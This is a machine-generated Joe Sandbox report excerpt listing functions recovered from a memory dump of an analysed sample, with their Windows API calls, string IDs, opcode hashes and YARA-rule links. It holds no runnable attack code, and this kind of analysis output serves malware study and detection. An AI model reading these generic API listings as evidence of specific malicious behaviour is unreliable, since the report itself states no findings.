                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                    Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 2507767853-234962358
                                                                                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                    Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 2507767853-234962358
                                                                                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                    Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                    Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                    • String ID: crts
                                                                                                                    • API String ID: 943502515-3724388283
                                                                                                                    • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                    • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                    Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$LabelVolume
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 2006950084-234962358
                                                                                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                    Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 772068139-4108050209
                                                                                                                    • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                    • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                    Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcscpy
                                                                                                                    • String ID: 3, 3, 8, 1
                                                                                                                    • API String ID: 3469035223-357260408
                                                                                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                    Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                    • API String ID: 2574300362-3530519716
                                                                                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                    Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                    • API String ID: 2574300362-275556492
                                                                                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                    Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                    • API String ID: 2574300362-58917771
                                                                                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                    Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                    Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                    • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                    • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                    • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                    Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
